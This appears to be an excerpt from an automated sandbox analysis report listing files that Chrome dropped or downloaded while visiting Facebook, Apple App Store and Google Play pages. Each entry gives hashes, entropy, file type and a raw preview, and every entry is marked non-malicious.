                                                                                                                                                                                                                                  Preview:RIFF....WEBPVP8L..../.......$)...M.=.X.~..Qm.J.....@.Z.......{...m.FiS...`..V..l&Z*. "...V..(..N......c..eLp..@..+..$..;.3......D.&a;|...H..R|;..3..#XD..UR..>V..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1386
                                                                                                                                                                                                                                  Entropy (8bit):4.8492224043496055
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:Yorj8jYfQypuazl92Qypua5HR9Iszb9mPuazEBb9mPuaSlSfvBLRKkfkMqVlM:Y4XzZzlkZTyszbgzEBbg+SJRKtpM
                                                                                                                                                                                                                                  MD5:662EA2BBC39B50BCDCBE04DC2CD7A087
                                                                                                                                                                                                                                  SHA1:4705F797D3E54D7953493DEBA121A8B4C397060F
                                                                                                                                                                                                                                  SHA-256:BFA43BCF43FA6CED5E1AF0BA042098DA244E4441A9C1D53E4B7B0DBFE764B1C6
                                                                                                                                                                                                                                  SHA-512:7E9903DE3548135C5C17813B2438D337BB565CEA17E6C3A5A4D7FF4B3A197A67B9FA6A16296A13174C5FA0D2E77EFBEC019E816541E074ACDB764F88EC685028
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:{"blacklistedFields":[],"constraints":{"profiles":{"AMPWeb":{"precedenceOrderedRules":[{"filters":{"nonEmptyFields":["isSignedIn"]},"fieldConstraints":{"clientId":{"generateValue":true,"namespace":"AMPWeb_isSignedOut","expirationPeriod":86400000}}},{"filters":{"valueMatches":{"isSignedIn":[true]}},"fieldConstraints":{"clientId":{"fieldType":"id","generateValue":true,"namespace":"AMPWeb_isSignedIn","expirationPeriod":15552000000}}}]}}},"treatmentProfiles":{"AMPWeb":{"treatments":[{"filters":{"isSignedIn":{"nonEmpty":true}},"fieldActions":{"clientId":{"treatmentType":"idGenerator","storageKeyPrefix":"mtClientId","namespace":"AMPWeb_isSignedOut","lifespan":86400000}}},{"filters":{"isSignedIn":{"valueMatches":[true]}},"fieldActions":{"clientId":{"treatmentType":"idGenerator","storageKeyPrefix":"mtClientId","namespace":"AMPWeb_isSignedIn","lifespan":15552000000}}}]}},"compoundSeparator":"_","fieldsMap":{"cookies":["itcCt","itscc"],"custom":{"impressions":["id","adamId","link.type","station-
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):9496
                                                                                                                                                                                                                                  Entropy (8bit):7.968542570130689
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:5nmUWvyhK0r7jdv7WVogGRZbHRzIJzLll5ZGvkqb5c02G1zOyiFYEDf:5njK0j57o7GjbxMxLll54vhatsSjFRT
                                                                                                                                                                                                                                  MD5:E3A7F799157D28C4BA2C4F66F5041446
                                                                                                                                                                                                                                  SHA1:330EE3FE5553F703512FF84A163A3F0F31FB3017
                                                                                                                                                                                                                                  SHA-256:BC11AFB3F580AD7E5A97A72115AA84353FF5D2D030A4375AD72A9C3EF42DE96B
                                                                                                                                                                                                                                  SHA-512:018433468EC2FC405B91FFC96C24F662D087CE9648A3073BA8E266F3E702B8E733F17A5A14323CD6B261DB1B002D528D3D559FFBAA63BAE589958F30AC0DDBB2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:RIFF.%..WEBPVP8L.%../?.....m.F....f......?;.jL,KaK.|............$).gf....m.?...q$IN.h, ..<..d..F..)..................7.......=...Df...18U._..."...H..(.y"...a..4.......y..]KI....f%.t...s./[.rc...V.:..j.2i...]S..I...k.V.d.}.4.:.7.....4.....|B..J.m...zp'..V...0...t.. .K..,@.d./...Um...n..)..!.h.TCD.....C...'..m........3$.......k#v...m../c..b'{...=.q;...zZU].....a......F...."K..).9..M]ff..Rr...w....K.....Cf.#.,...3...m.n[.}.}.%.N\;.....>333333333....|HJ.C...!.%=...'..m......p5.]f.$....^#..;..F.[.b...d0..?2...d.-....@..K..............T.f..@ &"`fG.s6.. .3.R..d...U..R*s%HST..3....k.@..............P`.!.&0@(0f.(..."..7 .lV.*U...D.k.".3....\...^.8G..S.."F..B.*......!.`..z.N.S....I&0...0i.P.r..Q5XQU.....3..H....=5..G>."....x&|..\......!.h..@6.;k_].........9....u.vnd.*|.... I@D...TU..r..@._.....Z<f..R...%.yQ........j.....'o.[...f^B.YD.l6|=..W......B.....o...@......v..._.].c.....A0..$Ywq.^........_o_t}=.~.q..3.*l..8q....`....V...;sO..]...............
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 480x360, components 3
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):10984
                                                                                                                                                                                                                                  Entropy (8bit):7.846913490532719
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:RTrqwnFSTc0/8DcTdvRaQlP13OsILGOTd5lu9wQ2fcGF7nnXRwnOIBpeDTJ5tiPM:xqISoyiQt15OTd/u9wQt+nX6p2p7
                                                                                                                                                                                                                                  MD5:640291AB704DE28AE9899ED978A0D738
                                                                                                                                                                                                                                  SHA1:66FD3E484C423E57FEFD352AC3D8C63B1CC0ED2C
                                                                                                                                                                                                                                  SHA-256:0F095CDFDF132A489749AE0E887B6F54F9642138249C3321E979CAFCE0C3030F
                                                                                                                                                                                                                                  SHA-512:B96060B581E92F4025F8CBB8F76ABD566506B692026590888517D0498E2DDEFB37733077BF687B7B5D445D751134375EC6186C5A99F7DDBB70A77983759E6784
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:......JFIF................................. ..%.....'10-'--5=PB58K9+-EaEKSV[\[2AemdXlPY[W......./../W757WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW]WWW]WW......h....".......................................A........................!1.AQ.aq...."...2BR...#r.3Sb....5CDc.................................).......................!1.A.Q"2.aq.#...............?............................................................................................................................................................}c....O.{.B.(...}c....|..............>.>...../..^.>.....'.=..N......X.~.{....'Zu..jX...w.O...=..S.d.W.O.{.@....w.^..e.O..~....>.....d....RJ.P...\...w.^...:...W.....6}c....Y..._L`l|6i~hw~........_.._.P5..>....\..X.~.ze.MV :4.%i.,Ro.....n...I?.%...2.3.8.z..C.k....._.Jq_.1....6......bu..`..}..)u....`5{.....G..~..U....R...>.>..........=...u.8w~..]V.7.&.Xw~..a....:..7.&.Xw~.."..w.:.U................N............T....u.Z...O.{.@.d....i....O.{.@.d....i.....j~.w~.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1130)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):1854
                                                                                                                                                                                                                                  Entropy (8bit):5.311393905103868
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:SKh3RakwAerXcySXPpQxpNpm1TsPSnryYml9:xh8kwA0Gb1TSork9
                                                                                                                                                                                                                                  MD5:5025D5524D28AA6879A5F6504C6F1540
                                                                                                                                                                                                                                  SHA1:D698AFAAE964F9EE09E3C9BAB04775367E1AAD12
                                                                                                                                                                                                                                  SHA-256:C032E30CA71DBF354429DBA854AF78020A36BAC804397992C317A2667128AB47
                                                                                                                                                                                                                                  SHA-512:AEAE9632C460D6E5850A3FAF1246EEA8AF0A88CA4A902ED4B2B3CE7D94AD5825D76B31B2372B6CEC3F2E33CDE216853B53FD8FC0203B6CFD01F7B8ED263EAF4A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3/yr/r/jJPH6iCu1HH.js
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("SubscriptionsHandler",["invariant"],(function(a,b,c,d,e,f,g,h){"use strict";function i(a){return a.remove||a.reset||a.unsubscribe||a.cancel||a.dispose}function j(a){i(a).call(a)}a=function(){function a(){this.$1=[]}var b=a.prototype;b.addSubscriptions=function(){for(var a=arguments.length,b=new Array(a),c=0;c<a;c++)b[c]=arguments[c];b.every(i)||h(0,3659);this.$1!=null?this.$1=this.$1.concat(b):b.forEach(j)};b.engage=function(){this.$1==null&&(this.$1=[])};b.release=function(){this.$1!=null&&(this.$1.forEach(j),this.$1=null)};b.releaseOne=function(a){var b=this.$1;if(b==null)return;var c=b.indexOf(a);c!==-1&&(j(a),b.splice(c,1),b.length===0&&(this.$1=null))};return a}();g["default"]=a}),98);.__d("throttle",["TimeSlice","TimeSliceInteractionSV","setTimeout","setTimeoutAcrossTransitions"],(function(a,b,c,d,e,f,g){function a(a,b,d){return h(a,b,d,c("setTimeout"),!1)}Object.assign(a,{acrossTransitions:function(a,b,d){return h(a,b,d,c("setTimeoutAcrossTransitions"),!1
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:MS Windows icon resource - 3 icons, 48x48, 24 bits/pixel, 32x32, 24 bits/pixel
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):12014
                                                                                                                                                                                                                                  Entropy (8bit):5.8597190788401115
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:L7xWVSgHQUkVbBQZf8POXQu2jMLlZYrZ7667V776+:L7xWVSgiV27QfjMLcrj
                                                                                                                                                                                                                                  MD5:87052396F5FFD63B642D1BAB54E7EDB7
                                                                                                                                                                                                                                  SHA1:F3E75DDE1FAD3A5FE639E3D0C04122FCFAB918E2
                                                                                                                                                                                                                                  SHA-256:EA54FEA4CE7FCA6339E5B437CA43CBD46C84AA46477BE66436608B5FB0A9E02C
                                                                                                                                                                                                                                  SHA-512:84F96774BF4E8CE6BDFFC68AB6ADFBAA7508BD8E9A3372A33C0032FB519BF51A6AFB34CD70CE8A84C32A1F4BEC2442B87CB5CBEE86EDD468D510E502705D4788
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://apps.apple.com/favicon.ico
                                                                                                                                                                                                                                  Preview:......00..........6... ......................h....)..(...0...`................................r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..r..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..t..v..v..u..v..v..u..u..u..v..u..v..v..v..u..v..v..u..u..u..v..u..u..v..v..v..u..v..u..u..u..v..u..u..v..v..v..u..v..v..u..u..u..v..u..u..v..v..u..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..w..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..y..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..{..}..}..}..}..}..}..}..}..}..}..}..}..}..}.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (32588)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):82019
                                                                                                                                                                                                                                  Entropy (8bit):5.75815842860286
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:mtw5hvigCLIGBPIim0sKymy8W2Cu20u6SMiNckCuvw4Im+gSUQJywmO8SQ:AIYLI0PIim0sKymy8W2Cu20u6gCuvw4l
                                                                                                                                                                                                                                  MD5:04EB01E703BC623D3F6E42D711DBD908
                                                                                                                                                                                                                                  SHA1:DB5243F2BB2142983BD3794E36DAEE6D186C6EDE
                                                                                                                                                                                                                                  SHA-256:029D5D5363C4A3A6D4175D60BE60CA6B58CDF71CB91D059B3AD16AE9C5B3CAC8
                                                                                                                                                                                                                                  SHA-512:9668CFB29C176DA1BFF9DC66FEC700D5FF2FB33127D48CAD38EFA2070CD7CCA5AA1B9D55399FFD19604AA89F03B2A8D2882A7276E460EA5EF3AE094ABCD6CFF1
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3/yT/r/DHWoESmf_2P.js
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("Nectar",["Env","getContextualParent"],(function(a,b,c,d,e,f){var g;function h(a){a.nctr||(a.nctr={})}function i(a){if((g||(g=b("Env"))).module||!a)return(g||(g=b("Env"))).module;var c={fbpage_fan_confirm:!0,photos_snowlift:!0},d;while(a&&a.getAttribute){var e=a.getAttribute("id");if(e!=null&&e.startsWith("pagelet_"))return e;!d&&c[e]&&(d=e);a=b("getContextualParent")(a)}return d}a={addModuleData:function(a,b){b=i(b);b&&(h(a),a.nctr._mod=b)}};e.exports=a}),null);.__d("AsyncRequestNectarLogging",["AsyncRequest","Nectar"],(function(a,b,c,d,e,f,g){Object.assign(c("AsyncRequest").prototype,{setNectarModuleData:function(a){this.method=="POST"&&d("Nectar").addModuleData(this.data,a)}})}),34);.__d("DamerauLevenshtein",[],(function(a,b,c,d,e,f){function a(a,b){if(a.length===0)return b.length;if(b.length===0)return a.length;if(a===b)return 0;var c,d,e=[];e[0]=[];e[1]=[];e[2]=[];for(d=0;d<=b.length;d++)e[0][d]=d;for(c=1;c<=a.length;c++)for(d=1;d<=b.length;d++){e[c%3][0]=c;
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (31307)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):60041
                                                                                                                                                                                                                                  Entropy (8bit):5.6168324604964806
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:yPmmMY1/F2OK5EIm1xB9Gpvv5JVscSiJIWJxcJEFatz+ob4y/JZ7C5ptGu1zgLhJ:y39lNB63wv40LXu1W
                                                                                                                                                                                                                                  MD5:259494BF48862D1C8D896DEB1AEE6162
                                                                                                                                                                                                                                  SHA1:B25A9230506CE005B39BC0CF36B90869EC2D5FF2
                                                                                                                                                                                                                                  SHA-256:EEE1C384002CAC1DF7DBAABCAC7B6D7167767B5FB4FE2021495DDF6535CC4F64
                                                                                                                                                                                                                                  SHA-512:A007461AEC1EF8F9571F5AC136140596F50D9B4E68B336BA73867134F2E7F2A99DA9FA8CEEBF5B51513240BF4A035AA8CA6BB6C4F5781DCE149494DC2819567A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:<!DOCTYPE html>.<html lang="en" id="facebook" class="no_js">.<head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="z3EF6MPL">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"ajaxpipe_token":"AXgONA8fCKnsGI7-UNM","stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ7zhOZlKDbaDDOqNOc","isCQuick":false,"brsid":"7419923676150673037"});</script><script nonce="z3EF6MPL">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="z3EF6MPL"></style><script nonce="z3EF6MPL">__DEV__=0;</script><noscript><meta http-equiv="refresh" content="0; URL=/shared/user_preferences/?_fb_noscript=1" /
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (17932)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):18154
                                                                                                                                                                                                                                  Entropy (8bit):4.913619694300307
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:7YNwwESzQnZKETYN2COZYcUBQA4LxWm3CKgB+2RR:yhNzrXNAtU9ArbM+AR
                                                                                                                                                                                                                                  MD5:73111912F4B4F7A5B5501DC74D50025B
                                                                                                                                                                                                                                  SHA1:94BAE7BE09CAE37C16321425B151EB0DE4592F0D
                                                                                                                                                                                                                                  SHA-256:AB6777F622DCE53EFA7D6A93432292AFBA7757445EB4CC111B25810882375B98
                                                                                                                                                                                                                                  SHA-512:DB7A6BF34BD0E3C739917EAD6BC24D31B63420498476756E99AAB232F7D14A9D0A86DD90764440089B66B2D544A327884F17B566DD02EB783360DA749789B738
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/../**. * License: https://www.facebook.com/legal/license/t3hOLs8wlXy/. */.__d("javascript-blowfish-1.0.5",[],(function(a,b,c,d,e,f){"use strict";b={};var g={exports:b};function h(){var a=function(b,c){this.key=b,(c==="ecb"||c==="cbc")&&(this.mode=c),this.sBox0=a.sBox0.slice(),this.sBox1=a.sBox1.slice(),this.sBox2=a.sBox2.slice(),this.sBox3=a.sBox3.slice(),this.pArray=a.pArray.slice(),this.generateSubkeys(b)};a.prototype={sBox0:null,sBox1:null,sBox2:null,sBox3:null,pArray:null,key:null,mode:"ecb",iv:"abc12345",keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",encrypt:function(a,b){if(this.mode==="ecb")return this.encryptECB(a);if(this.mode==="cbc")return this.encryptCBC(a,b);throw new Error("\u041d\u0435\u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0439 \u0440\u0435\u0436\u0438\u043c \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0438\u044f.")},decrypt:function(a,b){if(this.mode==="ecb")return this.decryptECB(a);if(this.mode==="cbc")retur
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 166x296, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):11894
                                                                                                                                                                                                                                  Entropy (8bit):7.98342607811884
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:dcYaJBNV6lne4iMA2YBrAvCIODgv9T1cGrK/Mb9O66bK+v/FiM:dVaWlwMAnqvCIODgnpUq9Ole+v/FT
                                                                                                                                                                                                                                  MD5:4D44567B356D4E4FAEBE3A88FDB84B84
                                                                                                                                                                                                                                  SHA1:EC4D3AEB588CC0BE162D790A0FC75B24096139E3
                                                                                                                                                                                                                                  SHA-256:98FAD711CCCE1DE287BB8A98006D5231F52AFA9921CC5D637C583B41E1B9ACEC
                                                                                                                                                                                                                                  SHA-512:60EBB4691889FE1C58202E698C8DCF1C39E7648F9F36601FA33AB370FE2A0CCC521B6C774E4F66CA9ADE361C81A7383F85D419986AF804390253D50C5F7679F1
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://play-lh.googleusercontent.com/LCVRRBHTcHs2NFs14MsnVMA51vENNhT-VUex4HRMXuBZmVJ1b6lJOTJnwC5LcSPurg=w526-h296-rw
                                                                                                                                                                                                                                  Preview:RIFFn...WEBPVP8 b........*..(.>a(.E$"....L@....8....w5.....a.<?.o.. .'./.~........>[.........%.3...Of_...{..........g.K.W......{......Y......./...?......w.{......./M........q>..g............._F...7...*^.......!|a......?....].........[..........g._..B...........~.........c..{..0.....'...~....g.O.............?.......././.o........].w./._....7..=.~....:.s...C..R...s.9_.}?..q930..!7....O...JD2.fp..372%.......r..kdq...1h.i...y./-`.H..*.L..u..umo.9.....#.KYh.6H!4{:.@.Q.g.Z.J7......8...C..$TP..G....I@.9}....b.....-o...W.Y..bZs...X...MQy8I..5.Z..?...Z.OvI..s....]..xL...z.UHL2.1..l.......g].=...Zw..i.K...=.|.Z\....P.st.S~....D.Q...O.qv....Y.b..4(............i.rRd..........:f.!I%R/C...n.DM.!.B_.D.T.*8%...+.t.....0.c...}.....;...&.....R...Z..,fqJ.i..6.LR..O.%....'`..c.......b./+|........q1<.=6.w.....e.v=...m.36..b.V...w....|.c...,........>..c...w.C...y.9&./."..\0=q^X?sN`#...X.........G.......>k.9........@.<.;.4.r$R.1[.&..~b.9..A....z.-...@..i...%.o.'`..f;..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (526)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1264
                                                                                                                                                                                                                                  Entropy (8bit):5.654108694307383
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:kz5RZUxsk69gdeqNmrUclcrvw4M6peHTnbl6BgLuie0UBZmxWBRAGsDprl:k5R2xcI1Ir4M6peH/l6Bgii4mxW7AZFB
                                                                                                                                                                                                                                  MD5:EF1DA519F825785CB499C37E202BBF0D
                                                                                                                                                                                                                                  SHA1:2E0063DE2AF85730E78A6750DFDE43CAC2299A2B
                                                                                                                                                                                                                                  SHA-256:DB008396BC100E90C3A9428708FE67BBFCB026EDFDFBCFFFA81884EB0B754A89
                                                                                                                                                                                                                                  SHA-512:407E845585D762123A85ABEE153AF5E3FD4D433896F59093E8AD1C3C3B917F1B8B1EF637C170FA1FD8EBDAA87A7F7B0FB362B9F4164C7E90A3EB150F8CE6AB2D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._.dTc=function(a,b){var c=a.qa;const d=a.Mf,e=a.Aa;var f=a.lb;a="";const g=!(!_.hh(e,2,!1)||!d.V());if(g)a+=_.TRc(b,e,f,c,d.Ja(),d.Tb(),d.vc());else{let m="";var h=d.Vd().length>0?_.yh(_.Y5(d.Vd()[0]),1):5,k=""+(d.H()?_.qZ(b,d.H()):"");k=(0,_.Io)(k);let n=h!==4||g?"mpg5gc":"W3ooef",q=h!==4||g?"":"jk75Ob";h=h!==4||g?"":"t8PG5e";let t="";f=f.card;const v=f.length;for(let y=0;y<v;y++){const x=f[y];t+='<div class="'+_.T("WHE7ib")+" "+_.T(n)+'">'+_.PRc(x,b)+"</div>"}b="";if(!g&&!d.na()&&_.R(k))switch(d.Vd().length){case 1:b+=."OCm4Td";break;case 2:b+="h63wFf";break;case 3:b+="GPXbj";break;case 4:b+="q12TOd";break;case 5:b+="j7aBgf";break;case 6:b+="Gm12vb";break;case 7:b+="bgqSOc";break;case 8:b+="QM3kBb";break;case 9:b+="LBjtdf";break;case 10:b+="YREuAd"}m+=_.S5((0,_.P)(t),d.Ja(),d.Tb(),k??null,!g,g,_.SRc(d.N()),b,void 0,_.Tz(e),void 0,"O2DNWb",h,q);a+=_.$W({qa:c,jsdata:d.vc()?_.Iq(d.vc())
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:M3U playlist, ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):903
                                                                                                                                                                                                                                  Entropy (8bit):5.372090323906076
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:PNfsAAjdrNW8/t3JdrAjP1drAYc6drXvuYJdravSgdrA0HdrRmHTdrS5:lfRcdprdM9dkAdjGYJdmKgd9HdMTdM
                                                                                                                                                                                                                                  MD5:255473BB47E5EDD79F2CCBFB9F6D4369
                                                                                                                                                                                                                                  SHA1:8724C535C715E135246F2292340136F3E47BAE20
                                                                                                                                                                                                                                  SHA-256:C29E311AD195EBB97EA8C62F5B4A42FFEAACE8DE3E83AF4170A61B1C3730F163
                                                                                                                                                                                                                                  SHA-512:6575FA3FBD52B465EE25EDC55726BEC219B233D4F62F60C68810C107217D8FA9EC6F45C6D090F09A6628EDDC7968FB3060DEB42A785260F9F25B3D307C7F9466
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:#EXTM3U.#EXT-X-TARGETDURATION:6.#EXT-X-VERSION:7.#EXT-X-MEDIA-SEQUENCE:0.#EXT-X-PLAYLIST-TYPE:VOD.#EXT-X-INDEPENDENT-SEGMENTS.#EXT-X-MAP:URI="P875466468_Anull_video_gr250_sdr_652x1412-.mp4",BYTERANGE="899@0".#EXTINF:3.60000,..#EXT-X-BYTERANGE:1647776@899.P875466468_Anull_video_gr250_sdr_652x1412-.mp4.#EXTINF:5.70000,..#EXT-X-BYTERANGE:2090789@1648675.P875466468_Anull_video_gr250_sdr_652x1412-.mp4.#EXTINF:3.53333,..#EXT-X-BYTERANGE:911497@3739464.P875466468_Anull_video_gr250_sdr_652x1412-.mp4.#EXTINF:2.63333,..#EXT-X-BYTERANGE:621829@4650961.P875466468_Anull_video_gr250_sdr_652x1412-.mp4.#EXTINF:3.63333,..#EXT-X-BYTERANGE:1666431@5272790.P875466468_Anull_video_gr250_sdr_652x1412-.mp4.#EXTINF:5.70000,..#EXT-X-BYTERANGE:2040977@6939221.P875466468_Anull_video_gr250_sdr_652x1412-.mp4.#EXTINF:5.20000,..#EXT-X-BYTERANGE:1551608@8980198.P875466468_Anull_video_gr250_sdr_652x1412-.mp4.#EXT-X-ENDLIST.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):339
                                                                                                                                                                                                                                  Entropy (8bit):5.207388850967682
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:kRZzRxVvnDTXRo56AuGNG/QVI3hixGnbnwQRaNw6JpyxZRNlad0:kRZTF5K9I/AIxixO8kbRN20
                                                                                                                                                                                                                                  MD5:CE763D52C6429DFAFAF8B9C73A51CDC4
                                                                                                                                                                                                                                  SHA1:647F9A683EB62D5EEBF4EFA08A02BDE4F77F64D4
                                                                                                                                                                                                                                  SHA-256:4BAF2E9D3CA6D4209D07EE8C3B4FCEA424A611E2FE52BF9B6F588292A3E74D33
                                                                                                                                                                                                                                  SHA-512:724315ED247103C355EF66F68A14EF9B7F09F3EA3A54834B2A28A3DBA6144DCF763083AEB1DA3F7BE5306B70BF8383F0A80EB2576834AD5FDB0C5A4EDC06F0D0
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._.u("xii62b");._.qr(_.hCa,class extends _.rr{constructor(a){super(a.ta)}H(){return"xii62b"}N(){return!0}Xa(){return _.jPc}});_.$q.xii62b=_.ARa;._.w();.}catch(e){_._DumpException(e)}.}).call(this,this.default_PlayStoreUi);.// Google Inc..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 480x360, components 3
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):37652
                                                                                                                                                                                                                                  Entropy (8bit):7.974148108955924
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:Qq8Z5qjiJHYdijkie+xJFCCQA2oHW7UtUI3/JWFp43tPt4V+L3+H:KCiwie+nFHquqI3hgpkCML3+H
                                                                                                                                                                                                                                  MD5:D6BFE3DF13973B305DA1D021B1E5988F
                                                                                                                                                                                                                                  SHA1:A73D7391BC11B81C4526211A554DDAB04376CDB3
                                                                                                                                                                                                                                  SHA-256:2E9CB798FEB5AFEC38D5C84B02FD246883761C8F7961E26F361EE31C2C425C99
                                                                                                                                                                                                                                  SHA-512:D03F9DBE4A45CE437B31A252CE7CA48727993A6A8D46E03A8FB1C286AC0D67D871AC888BDC17D9D9833E417BF07710710DA1E7DAFE3EB84AA8AB312D49939DCE
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
